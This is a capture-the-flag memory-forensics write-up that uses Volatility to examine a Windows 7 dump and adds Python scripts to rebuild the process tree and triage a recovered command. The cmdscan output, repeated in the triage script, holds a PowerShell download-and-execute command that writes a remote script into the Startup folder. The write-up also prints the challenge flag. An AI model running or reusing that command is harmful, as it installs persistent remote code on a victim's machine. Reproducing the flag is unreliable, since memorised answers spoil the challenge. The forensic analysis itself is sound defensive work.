Export
We are given a memory dump named WIN-LQS146OE2S1-20201027-142607.raw:
$ file WIN-LQS146OE2S1-20201027-142607.raw
WIN-LQS146OE2S1-20201027-142607.raw: data
Reading the name, we can assume it comes from a Windows machine.
Memory dump analysis
We will use volatility to analyze it (specifically, this Docker image):
$ docker run --rm -v "${PWD}":/project --entrypoint /bin/bash -it phocean/volatility
vol@6c13ee800d5a:/volatility$ cd /project
vol@6c13ee800d5a:/project$ python /volatility/vol.py -f WIN-LQS146OE2S1-20201027-142607.raw imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418
AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/project/WIN-LQS146OE2S1-20201027-142607.raw)
PAE type : No PAE
DTB : 0x187000L
KDBG : 0xf80001a540a0L
Number of Processors : 1
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0xfffff80001a55d00L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2020-10-27 14:26:09 UTC+0000
Image local date and time : 2020-10-27 19:56:09 +0530
It looks like we are dealing with Windows 7 (profile Win7SP1x64). Let's list all the processes:
vol@6c13ee800d5a:/project$ python /volatility/vol.py -f WIN-LQS146OE2S1-20201027-142607.raw --profile Win7SP1x64 pslist
Volatility Foundation Volatility Framework 2.6.1
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xfffffa8006cbd040 System 4 0 80 469 ------ 0 2020-10-27 14:12:08 UTC+0000
0xfffffa800765a040 smss.exe 228 4 2 29 ------ 0 2020-10-27 14:12:08 UTC+0000
0xfffffa8007610060 csrss.exe 320 304 9 359 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa8008012060 wininit.exe 360 304 3 77 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa800800e370 csrss.exe 368 352 9 190 1 0 2020-10-27 14:12:09 UTC+0000
0xfffffa800802e4a0 winlogon.exe 404 352 4 103 1 0 2020-10-27 14:12:09 UTC+0000
0xfffffa8008029b30 services.exe 460 360 7 199 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa8008050b30 lsass.exe 476 360 6 547 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa8008090b30 lsm.exe 484 360 9 142 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa80080dd2b0 svchost.exe 588 460 10 349 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa80081015f0 svchost.exe 656 460 8 266 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa8008126b30 svchost.exe 708 460 13 296 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa8008166b30 svchost.exe 832 460 37 871 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa8008180b30 svchost.exe 880 460 9 475 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa8008197b30 svchost.exe 916 460 10 207 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa80081c5b30 svchost.exe 964 460 17 489 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa800724b410 svchost.exe 328 460 16 289 0 0 2020-10-27 14:12:10 UTC+0000
0xfffffa8008276b30 spoolsv.exe 480 460 13 266 0 0 2020-10-27 14:12:10 UTC+0000
0xfffffa80081ef890 svchost.exe 1056 460 3 46 0 0 2020-10-27 14:12:10 UTC+0000
0xfffffa80082997c0 VGAuthService. 1088 460 3 86 0 0 2020-10-27 14:12:10 UTC+0000
0xfffffa80082c3890 vmtoolsd.exe 1124 460 11 254 0 0 2020-10-27 14:12:10 UTC+0000
0xfffffa80082d4b30 wlms.exe 1152 460 4 44 0 0 2020-10-27 14:12:10 UTC+0000
0xfffffa800834c5c0 sppsvc.exe 1336 460 4 149 0 0 2020-10-27 14:12:10 UTC+0000
0xfffffa80083b8060 WmiPrvSE.exe 1448 588 10 206 0 0 2020-10-27 14:12:10 UTC+0000
0xfffffa80083f7a30 dllhost.exe 1552 460 13 188 0 0 2020-10-27 14:12:11 UTC+0000
0xfffffa80083d5b30 msdtc.exe 1632 460 12 147 0 0 2020-10-27 14:12:11 UTC+0000
0xfffffa80083ca550 WmiPrvSE.exe 1948 588 9 194 0 0 2020-10-27 14:12:30 UTC+0000
0xfffffa80084beb30 svchost.exe 824 460 5 68 0 0 2020-10-27 14:14:10 UTC+0000
0xfffffa800834a590 taskhost.exe 1440 460 6 120 1 0 2020-10-27 14:22:09 UTC+0000
0xfffffa80080db410 dwm.exe 1412 916 5 69 1 0 2020-10-27 14:22:09 UTC+0000
0xfffffa8008432530 explorer.exe 808 1860 20 521 1 0 2020-10-27 14:22:10 UTC+0000
0xfffffa8008081b30 vm3dservice.ex 1008 808 2 35 1 0 2020-10-27 14:22:10 UTC+0000
0xfffffa8008531b30 vmtoolsd.exe 1800 808 8 177 1 0 2020-10-27 14:22:10 UTC+0000
0xfffffa800766cb30 TrustedInstall 800 460 5 121 0 0 2020-10-27 14:22:15 UTC+0000
0xfffffa80076cd8d0 cmd.exe 1640 808 1 20 1 0 2020-10-27 14:24:50 UTC+0000
0xfffffa80084bb6b0 conhost.exe 1780 368 2 39 1 0 2020-10-27 14:24:50 UTC+0000
0xfffffa8008591060 DumpIt.exe 2004 808 2 47 1 1 2020-10-27 14:26:07 UTC+0000
0xfffffa8006d20060 conhost.exe 1796 368 2 35 1 0 2020-10-27 14:26:07 UTC+0000
This output is fine, but sometimes it is better to use pstree to see the parent and child processes visually. Otherwise, we would have to look at the PID and PPID numbers.
vol@6c13ee800d5a:/project$ python /volatility/vol.py -f WIN-LQS146OE2S1-20201027-142607.raw --profile Win7SP1x64 pstree
Volatility Foundation Volatility Framework 2.6.1
Name Pid PPid Thds Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0xfffffa8007610060:csrss.exe 320 304 9 359 2020-10-27 14:12:09 UTC+0000
0xfffffa8008012060:wininit.exe 360 304 3 77 2020-10-27 14:12:09 UTC+0000
. 0xfffffa8008029b30:services.exe 460 360 7 199 2020-10-27 14:12:09 UTC+0000
.. 0xfffffa80082d4b30:wlms.exe 1152 460 4 44 2020-10-27 14:12:10 UTC+0000
.. 0xfffffa8008166b30:svchost.exe 832 460 37 871 2020-10-27 14:12:09 UTC+0000
.. 0xfffffa80081015f0:svchost.exe 656 460 8 266 2020-10-27 14:12:09 UTC+0000
.. 0xfffffa80083f7a30:dllhost.exe 1552 460 13 188 2020-10-27 14:12:11 UTC+0000
.. 0xfffffa8008126b30:svchost.exe 708 460 13 296 2020-10-27 14:12:09 UTC+0000
.. 0xfffffa80081ef890:svchost.exe 1056 460 3 46 2020-10-27 14:12:10 UTC+0000
.. 0xfffffa8008180b30:svchost.exe 880 460 9 475 2020-10-27 14:12:09 UTC+0000
.. 0xfffffa80082997c0:VGAuthService. 1088 460 3 86 2020-10-27 14:12:10 UTC+0000
.. 0xfffffa800834c5c0:sppsvc.exe 1336 460 4 149 2020-10-27 14:12:10 UTC+0000
.. 0xfffffa80083d5b30:msdtc.exe 1632 460 12 147 2020-10-27 14:12:11 UTC+0000
.. 0xfffffa80081c5b30:svchost.exe 964 460 17 489 2020-10-27 14:12:09 UTC+0000
.. 0xfffffa800724b410:svchost.exe 328 460 16 289 2020-10-27 14:12:10 UTC+0000
.. 0xfffffa80080dd2b0:svchost.exe 588 460 10 349 2020-10-27 14:12:09 UTC+0000
... 0xfffffa80083ca550:WmiPrvSE.exe 1948 588 9 194 2020-10-27 14:12:30 UTC+0000
... 0xfffffa80083b8060:WmiPrvSE.exe 1448 588 10 206 2020-10-27 14:12:10 UTC+0000
.. 0xfffffa80084beb30:svchost.exe 824 460 5 68 2020-10-27 14:14:10 UTC+0000
.. 0xfffffa800766cb30:TrustedInstall 800 460 5 121 2020-10-27 14:22:15 UTC+0000
.. 0xfffffa8008276b30:spoolsv.exe 480 460 13 266 2020-10-27 14:12:10 UTC+0000
.. 0xfffffa80082c3890:vmtoolsd.exe 1124 460 11 254 2020-10-27 14:12:10 UTC+0000
.. 0xfffffa800834a590:taskhost.exe 1440 460 6 120 2020-10-27 14:22:09 UTC+0000
.. 0xfffffa8008197b30:svchost.exe 916 460 10 207 2020-10-27 14:12:09 UTC+0000
... 0xfffffa80080db410:dwm.exe 1412 916 5 69 2020-10-27 14:22:09 UTC+0000
. 0xfffffa8008090b30:lsm.exe 484 360 9 142 2020-10-27 14:12:09 UTC+0000
. 0xfffffa8008050b30:lsass.exe 476 360 6 547 2020-10-27 14:12:09 UTC+0000
0xfffffa8006cbd040:System 4 0 80 469 2020-10-27 14:12:08 UTC+0000
. 0xfffffa800765a040:smss.exe 228 4 2 29 2020-10-27 14:12:08 UTC+0000
0xfffffa8008432530:explorer.exe 808 1860 20 521 2020-10-27 14:22:10 UTC+0000
. 0xfffffa8008531b30:vmtoolsd.exe 1800 808 8 177 2020-10-27 14:22:10 UTC+0000
. 0xfffffa8008081b30:vm3dservice.ex 1008 808 2 35 2020-10-27 14:22:10 UTC+0000
. 0xfffffa8008591060:DumpIt.exe 2004 808 2 47 2020-10-27 14:26:07 UTC+0000
. 0xfffffa80076cd8d0:cmd.exe 1640 808 1 20 2020-10-27 14:24:50 UTC+0000
0xfffffa800802e4a0:winlogon.exe 404 352 4 103 2020-10-27 14:12:09 UTC+0000
0xfffffa800800e370:csrss.exe 368 352 9 190 2020-10-27 14:12:09 UTC+0000
. 0xfffffa8006d20060:conhost.exe 1796 368 2 35 2020-10-27 14:26:07 UTC+0000
. 0xfffffa80084bb6b0:conhost.exe 1780 368 2 39 2020-10-27 14:24:50 UTC+0000
As can be seen, there is Explorer (explorer.exe), and as child processes we have some such as DumpIt.exe (which is used to dump the memory for the challenge), and then cmd.exe, which is a process that clearly stands out.
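The pstree view above is just the PID/PPID columns of pslist folded into a tree. As an added example (not part of the original writeup, and not Volatility code), the script below rebuilds that tree from pslist rows copied from the output above, reports processes whose parent is no longer in the listing (like explorer.exe, whose PPID 1860 has exited), and flags interactive shells spawned under a user shell such as explorer.exe. The regex, function names and the "suspicious shell" heuristic are my own assumptions.

```python
import re
from collections import defaultdict

# Rows copied from the pslist output above (offset, name, PID, PPID, threads,
# handles, session, wow64, start time). Constructed subset, not the full listing.
PSLIST_SAMPLE = """\
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------
0xfffffa8006cbd040 System 4 0 80 469 ------ 0 2020-10-27 14:12:08 UTC+0000
0xfffffa800765a040 smss.exe 228 4 2 29 ------ 0 2020-10-27 14:12:08 UTC+0000
0xfffffa8008012060 wininit.exe 360 304 3 77 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa8008029b30 services.exe 460 360 7 199 0 0 2020-10-27 14:12:09 UTC+0000
0xfffffa800800e370 csrss.exe 368 352 9 190 1 0 2020-10-27 14:12:09 UTC+0000
0xfffffa8008432530 explorer.exe 808 1860 20 521 1 0 2020-10-27 14:22:10 UTC+0000
0xfffffa80076cd8d0 cmd.exe 1640 808 1 20 1 0 2020-10-27 14:24:50 UTC+0000
0xfffffa80084bb6b0 conhost.exe 1780 368 2 39 1 0 2020-10-27 14:24:50 UTC+0000
0xfffffa8008591060 DumpIt.exe 2004 808 2 47 1 1 2020-10-27 14:26:07 UTC+0000
"""

# Assumed column layout of a Volatility 2 pslist row (Exit column may be empty).
ROW_RE = re.compile(
    r"^(0x[0-9a-f]+)\s+(\S+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\S+)\s+(\d)\s+(\S+ \S+ \S+)"
)

# Shells that are worth a second look when a user-facing process spawns them.
SHELL_NAMES = {"cmd.exe", "powershell.exe"}


def parse_pslist(text):
    """Return {pid: fields} from pslist text; header and separator lines are skipped."""
    procs = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        off, name, pid, ppid, thds, hnds, sess, wow64, start = m.groups()
        procs[int(pid)] = {
            "offset": off, "name": name, "ppid": int(ppid),
            "threads": int(thds), "handles": int(hnds),
            "session": sess, "wow64": wow64 == "1", "start": start,
        }
    return procs


def build_tree(procs):
    """Map each PID to its children and list the roots: PIDs whose parent is absent
    from the listing (an exited parent, as with PPID 1860 for explorer.exe here)."""
    children = defaultdict(list)
    for pid, p in procs.items():
        children[p["ppid"]].append(pid)
    roots = sorted(pid for pid, p in procs.items() if p["ppid"] not in procs)
    return children, roots


def render_tree(procs, children, roots):
    """Produce pstree-style lines: one leading dot per nesting level."""
    lines = []

    def walk(pid, depth):
        p = procs[pid]
        prefix = "." * depth + (" " if depth else "")
        lines.append(f"{prefix}{p['offset']}:{p['name']} {pid} {p['ppid']} {p['start']}")
        for child in sorted(children.get(pid, [])):
            walk(child, depth + 1)

    for root in roots:
        walk(root, 0)
    return lines


def shells_under_user_processes(procs, children, parent_names=("explorer.exe",)):
    """Return (parent_pid, child_pid, child_name) for shells spawned by the given parents."""
    hits = []
    for pid, p in procs.items():
        if p["name"].lower() in parent_names:
            for child in children.get(pid, []):
                if procs[child]["name"].lower() in SHELL_NAMES:
                    hits.append((pid, child, procs[child]["name"]))
    return hits


if __name__ == "__main__":
    procs = parse_pslist(PSLIST_SAMPLE)
    children, roots = build_tree(procs)
    print("\n".join(render_tree(procs, children, roots)))
    for parent, child, name in shells_under_user_processes(procs, children):
        print(f"[!] {procs[parent]['name']} ({parent}) spawned {name} ({child})")
```

Orphaned roots are expected for explorer.exe (its launcher, userinit.exe, normally exits), so the interesting signal is not the missing parent but the console shell sitting under the user's shell at the time of capture.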
Command-line analysis
That said, we will use cmdscan to analyze what has been run from the command line:
vol@6c13ee800d5a:/project$ python /volatility/vol.py -f WIN-LQS146OE2S1-20201027-142607.raw --profile Win7SP1x64 cmdscan
Volatility Foundation Volatility Framework 2.6.1
**************************************************
CommandProcess: conhost.exe Pid: 1780
CommandHistory: 0x257430 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 1 LastAdded: 0 LastDisplayed: 0
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x60
Cmd #0 @ 0x23bde0: echo iex(iwr "http%3A%2F%2Fbit.ly%2FSFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30%3D.ps1") > C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3usy12fv.ps1
**************************************************
CommandProcess: conhost.exe Pid: 1796
CommandHistory: 0x2c6a90 Application: DumpIt.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x60
We can see that someone was trying to download a PowerShell payload from this URL:
http://bit.ly/SFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30=.ps1
Flag
The resource name looks Base64-encoded, and in fact it is the flag:
$ echo SFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30= | base64 -d
HTB{W1Nd0ws_f0r3Ns1CS_3H?}
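The cmdscan line carries three things a responder wants pulled out automatically: the percent-encoded download URL, the redirect target (which here is the per-user Startup folder, so the dropped .ps1 would run at the next logon), and the Base64 resource name that turns out to be the flag. As an added example that is not part of the original writeup, the script below performs that triage on the exact command recovered above; the regexes, function names and the iex(iwr ...) cradle check are my own assumptions, and the sample command is copied from the cmdscan output.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# The Cmd #0 line recovered by cmdscan above, copied verbatim (Python string escaping only).
CMD_LINE = (
    'echo iex(iwr "http%3A%2F%2Fbit.ly%2FSFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30%3D.ps1") '
    '> C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\3usy12fv.ps1'
)

URL_RE = re.compile(r"https?://[^\s\"')]+")
# Shell output redirection: "> path" or ">> path" up to the end of the line.
REDIRECT_RE = re.compile(r"(?:^|\s)>{1,2}\s*(.+?)\s*$")
# Per-user autostart folder; anything written here runs at the next logon.
STARTUP_MARKER = r"\Microsoft\Windows\Start Menu\Programs\Startup"
# PowerShell download-and-execute cradle: Invoke-Expression over Invoke-WebRequest.
CRADLE_RE = re.compile(r"\biex\s*\(\s*iwr\b", re.IGNORECASE)


def decode_command(raw):
    """Percent-decode the command and pull out URLs and the redirect target."""
    decoded = unquote(raw)
    m = REDIRECT_RE.search(decoded)
    return {
        "decoded": decoded,
        "urls": URL_RE.findall(decoded),
        "redirect_target": m.group(1) if m else None,
    }


def writes_to_startup(path):
    """True when the path points into a user's Startup folder (case-insensitive)."""
    return path is not None and STARTUP_MARKER.lower() in path.lower()


def decode_resource_name(url):
    """Take the last path segment of the URL, drop its extension and try Base64.
    Returns the decoded text, or None when the segment is not valid Base64/UTF-8."""
    name = url.rsplit("/", 1)[-1]
    stem = name.rsplit(".", 1)[0] if "." in name else name
    try:
        raw = base64.b64decode(stem, validate=True)
        return raw.decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def triage(raw):
    """Return a list of human-readable findings for one recovered command line."""
    info = decode_command(raw)
    findings = []
    if info["decoded"] != raw:
        findings.append("percent-encoded arguments (light obfuscation)")
    if CRADLE_RE.search(info["decoded"]):
        findings.append("PowerShell download cradle: iex(iwr ...)")
    if writes_to_startup(info["redirect_target"]):
        findings.append(f"persistence: script written to Startup folder -> {info['redirect_target']}")
    for url in info["urls"]:
        name = decode_resource_name(url)
        if name is not None:
            findings.append(f"Base64 resource name in {url} decodes to: {name}")
    return findings


if __name__ == "__main__":
    for finding in triage(CMD_LINE):
        print("[*]", finding)
```

Note that cmdscan only shows the command as typed into cmd.exe; whether the Startup script was actually written and whether the URL was ever fetched would have to be confirmed with filescan/dumpfiles on the dump and with proxy or DNS logs.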